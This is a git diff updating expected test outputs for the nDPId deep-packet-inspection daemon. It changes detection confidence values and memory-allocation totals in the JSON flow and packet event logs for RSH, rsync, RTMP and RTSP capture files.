{"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} -00783{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1654277362292,"flow_last_seen":1654277363725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277363725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1021,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} -00783{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1654277359673,"flow_last_seen":1654277360987,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277363725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1023,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} 
+00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1654277362292,"flow_last_seen":1654277362309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1654277362309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1021,"dst_port":514,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} +00783{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"rsh.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1654277362292,"flow_last_seen":1654277363725,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277363725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1021,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} 
+00783{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"rsh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1654277359673,"flow_last_seen":1654277360987,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1654277363725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":1023,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"RSH","breed":"Unsafe","category":"RemoteAccess"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":24,"source":"rsh.pcap","alias":"nDPId-test","packets-captured":24,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":105,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1654277363725} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 24/24 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5875381 bytes -~~ total memory freed........: 5875381 bytes -~~ total allocations/frees...: 118146/118146 +~~ total memory allocated....: 6009015 bytes +~~ total memory freed........: 6009015 bytes +~~ total allocations/frees...: 120908/120908 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 788 chars 
diff --git a/test/results/rsync.pcap.out b/test/results/rsync.pcap.out index fce83f4a3..38b34a082 100644 --- a/test/results/rsync.pcap.out +++ b/test/results/rsync.pcap.out 
@@ -4,8 +4,8 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387144174826,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8ACBAAEAGPJp\/AAABfwAAAdTZA2mzXXC1AAAAAKACqqr+MAAAAgT\/1wQCCAoAPHCVAAAAAAEDAwo="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387144174826,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAAQNp1NlRGhcWs11wtqASqqr+MAAAAgT\/1wQCCAoAPHCVADxwlQEDAwo="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387144174826,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387144174826,"pkt":"AAAAAAAAAAAAAAAACABFAAA0ACFAAEAGPKF\/AAABfwAAAdTZA2mzXXC2URoXF4AQACv+KAAAAQEICgA8cJUAPHCV"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1387144174826,"flow_last_seen":1387144174828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1387144174828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1387144174826,"flow_last_seen":1387144174967,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":346,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387144174967,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1387144174826,"flow_last_seen":1387144174828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1387144174828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} 
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1387144174826,"flow_last_seen":1387144174967,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":346,"flow_tot_l4_payload_len":497,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387144174967,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":54489,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RSYNC","breed":"Acceptable","category":"DataTransfer"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":30,"source":"rsync.pcap","alias":"nDPId-test","packets-captured":30,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":497,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1387144174967} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 30/30 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872361 bytes -~~ total memory freed........: 5872361 bytes -~~ total allocations/frees...: 118145/118145 +~~ total memory allocated....: 6005995 bytes +~~ total memory freed........: 6005995 bytes +~~ total allocations/frees...: 120907/120907 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 681 chars diff --git a/test/results/rtmp.pcap.out b/test/results/rtmp.pcap.out index 9ae0f9c7d..7942c9048 100644 
--- a/test/results/rtmp.pcap.out +++ b/test/results/rtmp.pcap.out 
@@ -4,8 +4,8 @@ 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1196541506793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506793,"pkt":"AAwpfMZqAFBWwAAICABFAAAwAzJAAIAGH8TAqCsBwKgrgASZB49J0s7PAAAAAHAC\/\/+GgwAAAgQFtAEBBAI="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1196541506794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1196541506794,"pkt":"AFBWwAAIAAwpfMZqCABFAAAwAABAAEAGYvbAqCuAwKgrAQePBJklcSWUSdLO0HASFtAknQAAAgQFtAEBBAI="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1196541506794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1196541506794,"pkt":"AAwpfMZqAFBWwAAICABFAAAoAzNAAIAGH8vAqCsBwKgrgASZB49J0s7QJXEllVAQ\/\/9oMQAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1196541506793,"flow_last_seen":1196541507028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2797,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1196541507028,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1196541506793,"flow_last_seen":1196541507836,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6948,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1196541507836,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1196541506793,"flow_last_seen":1196541507028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2797,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":1196541507028,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1196541506793,"flow_last_seen":1196541507836,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6948,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1196541507836,"l3_proto":"ip4","src_ip":"192.168.43.1","dst_ip":"192.168.43.128","src_port":1177,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} 00552{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"rtmp.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-payload-len":6948,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1196541507836} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 26/26 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872245 bytes -~~ total memory freed........: 5872245 bytes -~~ total allocations/frees...: 118141/118141 +~~ total memory allocated....: 6005879 bytes +~~ total memory freed........: 6005879 bytes +~~ total allocations/frees...: 120903/120903 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 452 chars ~~ json string max len.......: 684 chars diff --git a/test/results/rtsp.pcap.out b/test/results/rtsp.pcap.out index 442664d37..b4def8420 100644 --- a/test/results/rtsp.pcap.out +++ b/test/results/rtsp.pcap.out 
@@ -2,46 +2,46 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1627567277506} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} 
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1627567277506,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAAL1W3kAAgAaMTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} 00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":205,"pkt_l4_len":169,"thread_ts_msec":1627567277506,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAAL1W3kAAfwaNTgoBAQoKAgICzPYhajvib4JhB2\/CUBgEAcxeAABHRVRfUEFSQU1FVEVSIHJ0c3A6Ly8xMC4yLjIuMjo4NTU0LyBSVFNQLzEuMA0KQ1NlcTogNw0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpTZXNzaW9uOiA2NjBmYzRjMGM2YWQ0M2ExDQoNCg=="} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567279015,"flow_last_seen":1627567279015,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567279015,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1627567279015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1627567279015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRW5UAAgAaM0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1627567279015,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567279015,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRW5UAAfwaN0AoBAQoKAgICzPghaqHfszoAAAAAgAL68BmUAAACBAW0AQMDCAEBBAI="} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567279015,"flow_last_seen":1627567279029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567279029,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 
Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567279015,"flow_last_seen":1627567279029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567279029,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567338841,"flow_last_seen":1627567338841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567338841,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1627567338841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567338841,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="} 
